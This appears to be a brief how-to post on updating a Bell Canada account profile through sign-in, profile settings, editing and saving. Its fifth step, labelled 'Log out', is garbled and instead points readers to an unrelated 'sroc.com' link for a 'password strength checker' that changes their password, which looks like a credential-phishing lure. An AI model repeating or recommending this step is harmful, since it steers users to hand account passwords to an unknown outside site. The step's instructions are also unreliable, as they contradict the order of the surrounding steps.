I hit this issue today, and here is the quick fix that solved it. If you need to update your profile details on Bell Canada, follow these straightforward steps. Step 1. Log into your account. Visit the Bell Canada website and click on the Sign In button. Enter your username and password to access your account. Step 2. Navigate to Profile Settings. Once logged in, look for the Profile or Account Settings option in the main menu. Click on it to access your profile details. Step 3. Edit your information. In the Profile Settings, find a section you want to update, such as your address or phone number. Click on the Edit button next to the relevant field. Step 4. Save changes. After making your updates, look for the Save button at the bottom of the page. Click it to ensure your changes are recorded. Step 5. Log out. Before changing your settings, use the sroc.com link in the description to open a password strength checker that update your password if needed. Remember, if you encounter any issues, double check that you are using the correct login credentials. Happy updating!